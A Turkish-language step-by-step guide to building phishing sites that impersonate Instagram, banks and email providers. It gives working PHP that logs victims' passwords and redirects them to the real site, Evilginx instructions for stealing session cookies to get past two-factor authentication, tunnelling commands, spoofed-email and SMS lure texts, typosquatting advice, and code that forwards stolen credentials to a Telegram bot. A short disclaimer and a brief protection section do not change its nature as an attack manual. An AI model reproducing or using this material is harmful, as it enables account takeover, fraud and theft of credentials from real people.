🎣 Phising Sitesi Yapma Rehberi

🎣 PHISHING SİTESİ YAPMA REHBERİ – SOSYAL MEDYA, BANKA, E-POSTA TAKLİDİ​

Selam. Bu rehberde, bir hedefin şifresini çalmak için nasıl oltalama (phishing) sitesi kuracağını anlatıyorum. Instagram, Facebook, Twitter, Gmail, bankalar, her şeyi yapabilirsin. Ayrıca Evilginx ile 2FA’yı (iki adımlı doğrulama) nasıl bypass edeceğini de gösteriyorum.

⚠️ ETİK UYARI: Bu rehber yalnızca eğitim ve izinli sızma testleri içindir. Başkalarının hesaplarını izinsiz ele geçirmek suçtur, hapis cezası vardır. Sorumluluk tamamen kullanıcıya aittir.

---

📁 BÖLÜM 1 – PHISHING NEDİR VE NASIL ÇALIŞIR?​

Phishing, kurbanı sahte bir web sitesine yönlendirip kullanıcı adı, şifre, kredi kartı gibi bilgilerini girmesini sağlamaktır.

Temel adımlar:

1. Hedeflediğin sitenin birebir kopyasını yap.
2. Bu sahte siteyi bir hostinge veya geçici bir servise (ngrok, serveo) yayınla.
3. Kurbanı bu siteye yönlendir (e-posta, SMS, sosyal medya mesajı ile).
4. Kurban şifresini girince, bilgileri sana gelsin.
5. Kurbanı gerçek siteye yönlendir (şüphelenmesin).

---

📁 BÖLÜM 2 – HAZIR PHISHING ARAÇLARI (EN POPÜLERLER)​

En kolay yöntem, hazır araçları kullanmak. Bunların çoğu önceden yapılmış sahte sayfalar ve otomatik veri toplama içerir.

🏆 2.1. Zphisher (En popüler, en çok site desteği)​

Kurulum:

bash
git clone https://github.com/htr-tech/zphisher.git
cd zphisher
bash zphisher.sh
Desteklediği siteler: Instagram, Facebook, Twitter, Google, Snapchat, Github, Yahoo, Protonmail, Spotify, Netflix, Linkedin, Whatsapp, Discord, Ebay, Amazon, Paypal, Wordpress, Microsoft, Deviantart, Adobe, BDO, Crypto, Steam, Playstation, Twitch, Pinterest ve daha fazlası (30+).

Kullanım:

• Çalıştır → Listeden site seç (Instagram 1, Facebook 2, vs.)
• Tünel seç (Cloudflare veya localhost)
• Gönderilecek link otomatik oluşur
• Kurban linke tıklar → Sahte sayfa açılır
• Şifre girince auth klasörüne kaydedilir

Simüle edilmiş çıktı:

text
[+] Waiting for target, Open the link: https://example.zphisher.cloud
[+] Target opened the link!
[+] Instagram ID: [email protected]
[+] Password: mySecret123
[+] Saved: auth/insta_2026-04-21-12-30.txt

🎭 2.2. BlackEye (Eski ama sağlam)​

Kurulum:

bash
git clone https://github.com/An0nUD4Y/blackeye.git
cd blackeye
bash blackeye.sh
Arayüzü basit, 20+ site var. Zphisher’dan daha az güncel ama yine de çalışıyor.

🔐 2.3. HiddenEye (Gelişmiş)​

Kurulum:

bash
git clone https://github.com/DarkSecDevelopers/HiddenEye.git
cd HiddenEye
python3 HiddenEye.py
Özellikleri:

• 30+ site template’i
• Ngrok, Serveo, Localhost tünel
• Otomatik port forwarding
• Cloudflare bypass denemeleri

---

📁 BÖLÜM 3 – SIFIRDAN PHISHING SİTESİ YAPMA (MANUEL)​

Hazır araçlar iyidir ama bazı hedefler için özel bir sayfa hazırlaman gerekir (örneğin şirketin iç portalı, özel bir banka).

🧩 3.1. Hedef Sitenin Kaynak Kodunu Kopyalama​

Adımlar:

1. Hedef siteyi aç (örneğin Instagram giriş sayfası).
2. Ctrl+U ile kaynak kodu görüntüle veya Ctrl+Shift+I (geliştirici araçları) > Elements sekmesi.
3. Ana HTML’i kopyala (<html>’den </html>’e kadar).
4. Yeni bir .html dosyası oluştur, yapıştır.

✏️ 3.2. Form Action’ı Değiştirme​

Orijinal kodda form verileri gerçek siteye gönderilir. Sen bunu kendi sunucuna yönlendirmelisin.

Orijinal hali:

html
<form method="POST" action="https://www.instagram.com/accounts/login/">
Değiştirilmiş hali:

html
<form method="POST" action="login.php">

🐘 3.3. PHP ile Veri Toplama Script’i​

Aynı dizinde login.php dosyası oluştur:

php
<?php
$username = $_POST['username'];
$password = $_POST['password'];
$ip = $_SERVER['REMOTE_ADDR'];
$date = date('Y-m-d H:i:s');

$log = "[$date] IP: $ip | Kullanıcı: $username | Şifre: $password\n";
file_put_contents('passwords.txt', $log, FILE_APPEND);

// Kurbanı gerçek siteye yönlendir (şüphelenmesin)
header('Location: https://www.instagram.com/accounts/login/');
exit();
?>

📤 3.4. Kurbanı Yönlendirme (Tünel Servisleri)​

Kendi bilgisayarında test ederken kurbana gönderemezsin çünkü localhost (127.0.0.1) sadece sende çalışır. Bunun için tünel servisleri kullan.

Ngrok (en popüler):

1. ngrok.com’dan ücretsiz hesap aç, binary indir.
2. ./ngrok http 80 (veya 8080, hangi portta çalışıyorsan).
3. Ngrok sana https://xxxx.ngrok.io gibi bir link verir.
4. Bu linki kurbana gönder.

Serveo (daha basit, SSH tünel):

bash
ssh -R 80:localhost:80 serveo.net
Link otomatik oluşur.

Localhost.run:

bash
ssh -R 80:localhost:80 localhost.run

---

📁 BÖLÜM 4 – EVILGNEX ILE 2FA BYPASS (OTP, SMS KODU, GOOGLE AUTHENTICATOR)​

Normal phishing sadece şifre alır. Ama çoğu hesapta artık iki adımlı doğrulama (2FA) var. Evilginx, kurbanın oturum çerezini (session cookie) çalar, böylece 2FA’yı hiç görmeden hesaba girersin.

🦹 4.1. Evilginx Nedir?​

Reverse proxy framework. Kurbanın tarayıcısı ile gerçek site arasına girer. Kurban ne yaparsa, Evilginx onu kopyalar. Oturum çerezi ele geçirildiğinde, 2FA’yı bypass edersin.

⚙️ 4.2. Kurulum (VPS gerekir – DigitalOcean, Vultr, Hetzner)​

Ubuntu 22.04 / Debian 11:

bash
sudo apt update && sudo apt upgrade -y
sudo apt install git build-essential -y

git clone https://github.com/evilginx2/evilginx2
cd evilginx2
make
sudo make install
Phishlet’leri yükle:

bash
evilginx -p
# phishlets komutu ile listeyi gör
phishlets list

🎯 4.3. Phishlet Aktifleştirme (Örnek: Instagram)​

bash
phishlets host instagram yourdomain.com
phishlets enable instagram
yourdomain.com senin domainin (VPS’nin IP’sine yönlendirilmeli). Ücretsiz domain almak için freenom.com veya duckdns.org kullan.

🔗 4.4. Kurbana Link Gönderme​

Evilginx sana https://yourdomain.com gibi bir link verir. Kurban bu linke tıklar, normal Instagram giriş sayfasını görür. Şifresini ve 2FA kodunu girer. Evilginx çerezi kopyalar.

📥 4.5. Çerez ile Hesaba Giriş​

bash
sessions
# oturum ID'sini al
sessions <ID>
Çerezler alındıktan sonra, EditThisCookie gibi bir tarayıcı eklentisiyle kendi tarayıcına bu çerezleri ekleyip hedefin hesabına girersin. 2FA sormaz.

🧠 4.6. Evilginx’e Özel Domain Ayarlama​

Ücretsiz domain al (examplephish.duckdns.org), VPS IP’ne yönlendir. Evilginx’te phishlets host instagram examplephish.duckdns.org yap. Link daha inandırıcı olur.

---

📁 BÖLÜM 5 – KURBANI TUZAĞA DÜŞÜRME YÖNTEMLERİ​

📧 5.1. E-posta ile (Email Spoofing)​

Araçlar: swaks, sendemail, Gmail SMTP ile sahte e-posta.

Örnek swaks komutu:

bash
swaks --to [email protected] --from "gü[email protected]" --header "Subject: Hesabınız Askıya Alındı" --body "Merhaba, hesabınızı doğrulamak için tıklayın: https://sizinphishinglinkiniz.com"
Gönderen adresini taklit etmek için SPF/DKIM koruması olmayan domainler kullan veya Gmail üzerinden manuel gönder (gönderen adı değişmez ama kurban dikkat etmez).

📱 5.2. SMS ile (Smishing)​

Servisler: TextNow, Google Voice, Twilio (ücretli). Hedefin ülkesine göre sanal numara bul.

Örnek SMS:

text
Instagram: Hesabınıza şüpheli giriş tespit edildi. Giriş yaparak doğrulayın: https://sizinphishinglinkiniz.com

💬 5.3. Sosyal Medya Mesajı​

• Instagram DM: "Hesabını çalıyorlar, hemen giriş yap: link"
• Discord DM: "Ücretsiz Nitro kazan, tıkla: link"
• Twitter DM: "Videon viral oldu, izle: link"

🌐 5.4. URL Kısaltma ve Gizleme​

Linki direkt gönderme. Şunları kullan:

• bit.ly (özel bit.ly hesabı ile linki istediğin gibi adlandırabilirsin)
• tinyurl.com
• cutt.ly
• rebrandly (kendi domaininle link kısaltma)

Ayrıca link’te typosquatting yap: instagrqm.com, faceb00k.com, gmail-login.xyz

---

📁 BÖLÜM 6 – VERİLERİ TOPLAMA VE SAKLAMA​

📂 6.1. Basit PHP ile Toplama (yukarıda verildi)​

🤖 6.2. Telegram Botu ile Anında Bildirim​

login.php içine ekle:

php
$bot_token = "YOUR_BOT_TOKEN";
$chat_id = "YOUR_CHAT_ID";
$message = "Yeni giriş! Kullanıcı: $username | Şifre: $password";
file_get_contents("https://api.telegram.org/bot$bot_token/sendMessage?chat_id=$chat_id&text=".urlencode($message));
Bot token almak: Telegram’da @BotFather’a /newbot yaz.

🗃️ 6.3. MySQL ile Veritabanına Kaydetme​

php
$conn = new mysqli("localhost", "user", "password", "phishing");
$sql = "INSERT INTO victims (username, password, ip, date) VALUES ('$username', '$password', '$ip', '$date')";
$conn->query($sql);

---

📁 BÖLÜM 7 – PHISHING’DEN KORUNMA (HEDEF OLMA)​

Bu rehberi hackleme için okuyorsan, aynı zamanda nasıl korunacağını da bilmelisin.

Kendini koruma yöntemleri:

• Her zaman URL’yi kontrol et (https, domain adı).
• 2FA kullan (ama SMS değil, tercihen Google Authenticator veya hardware key).
• Linke tıklamadan önce üzerine gel (tooltip’te gerçek URL görünür).
• Tarayıcıda password manager kullan (Bitwarden) – otomatik doldurma sadece gerçek sitede çalışır.
• E-posta ve SMS’lerde asla linke tıklama, manuel olarak siteye git.

---

📊 ÖZET – PHISHING ARAÇLARI VE YÖNTEMLER​

Araç / Yöntem	Kullanım Amacı	Zorluk	2FA Bypass
Zphisher	Hazır template + otomatik tünel	Çok kolay	Hayır
BlackEye	Hazır template	Kolay	Hayır
HiddenEye	Hazır template + gelişmiş tünel	Orta	Hayır
Evilginx	Session hijacking ile 2FA bypass	Zor	Evet
Manuel HTML + PHP	Özel hedef için	Orta	Hayır
Ngrok / Serveo	Localhost’u internete açma	Kolay	-
Telegram Bot	Anlık bildirim	Kolay	-

---

🧩;​

Phishing, en eski ama hala en etkili saldırı yöntemlerinden biridir. İnsanları kandırmak, bir zafiyet açmaktan genelde daha kolaydır. Bu rehberde öğrendiklerini sadece eğitim ve izinli testler için kullan. Başkasının hesabını çalmak suçtur ve er geç yakalanırsın (IP kayıtları, hosting logları, polis teknik takibi).